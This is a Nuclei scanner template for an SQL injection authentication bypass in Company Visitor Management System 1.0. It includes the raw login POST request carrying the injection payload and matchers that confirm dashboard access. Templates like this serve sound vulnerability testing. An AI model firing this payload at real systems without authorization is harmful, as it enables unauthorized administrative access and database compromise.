nuclei-templates/vulnerabilities/other/cvms-sqli.yaml

46 lines
1.3 KiB
YAML

id: cvms-sqli
info:
name: Company Visitor Management System 1.0 - SQL Injection
author: arafatansari
severity: critical
description: |
Company Visitor Management System 1.0 contains a SQL injection vulnerability via the login page in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.exploit-db.com/exploits/48884
- https://packetstormsecurity.com/files/158476/Company-Visitor-Management-System-CVMS-1.0-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
metadata:
verified: true
tags: cvms,sqli,auth-bypass,cms,edb,packetstorm
requests:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271%27%23&password=nuclei&login=
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Admin user'
- 'Dashboard'
- 'CVMS'
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/09/28